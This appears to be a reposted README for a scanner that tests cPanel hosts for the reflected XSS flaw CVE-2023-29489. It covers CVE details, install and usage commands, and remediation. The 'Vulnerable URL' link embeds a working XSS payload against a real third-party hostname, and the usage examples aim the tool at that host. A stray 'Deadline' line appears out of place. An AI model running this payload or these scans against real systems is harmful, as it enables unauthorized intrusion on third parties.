## https://sploitus.com/exploit?id=A9B2E12E-7C0B-5943-9D14-7C26EE00669F
# cpanel_29489 Tool
## Overview
The cpanel_29489 tool is designed to identify and test the Cross-Site Scripting (XSS) vulnerability (CVE-2023-29489) in cPanel. This tool allows security professionals to check whether a given URL is susceptible to XSS attacks and provides a way to test different payloads.
## Bug Details
- **CVE ID:** CVE-2023-29489
- **Bug Name:** R-XSS
- **Bug Priority:** Medium
- **Vulnerable URL:** [http://private-wireless-rom.ext.net.nokia.com/cpanelwebcall/](http://private-wireless-rom.ext.net.nokia.com/cpanelwebcall/%3Cimg%20src=x%20onerror=%22prompt%28'karthithehacker'%29%22%3Eaaaaaaaaaaaa)
- **CVE Description:** An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
## Tool Usage
### Installation
```bash
pip install -i https://test.pypi.org/simple/ cpanel-29489
```
### Command Line Options
- `-u` or `--url`: Specify the target URL.
- `-o` or `--output`: Specify the output file to store the results.
- `-p` or `--payload`: Specify the path to a file containing custom XSS payloads.
- `-i` or `--input`: Specify the path to a file containing a list of URLs to test.
### Examples
1. Basic usage with default payload:
```bash
cpanel_29489 -u http://private-wireless-rom.ext.net.nokia.com/ -o output.txt
```
2. Using custom payload file:
```bash
cpanel_29489 -u http://private-wireless-rom.ext.net.nokia.com/ -o output.txt -p https://raw.githubusercontent.com/Praveenms13/CVE-2023-29489/main/xss-payload.txt
```
3. Batch testing from an input file:
```bash
cpanel_29489 -i /path/to/input.txt -o output.txt
```
## Output
The tool generates a detailed output indicating the vulnerable URLs and the payloads that triggered the XSS vulnerability.
## Impact
The impact of an XSS attack can vary depending on the nature of the application. It may range from minimal impact in public, anonymous applications to serious or critical impact in applications with sensitive data or privileged access.
## Remediation
To mitigate the vulnerability, apply the latest security patches or updates provided by cPanel.
## References
- [Assetnote Blog](https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/)
- [NIST CVE Details](https://nvd.nist.gov/vuln/detail/CVE-2023-29489)
- [cPanel Forums](https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/)
## Contact
- **POC by:** [@karthithehacker](https://twitter.com/karthithehacker)
- **Mail:** [contact@karthithehacker.com](mailto:contact@karthithehacker.com)
- **Website:** [Karthithehacker.com](https://karthithehacker.com)
## Deadline
The deadline for this task is Monday.
## Disclaimer
This tool is developed for educational and testing purposes. Use it responsibly and ensure you have proper authorization before testing any system.
---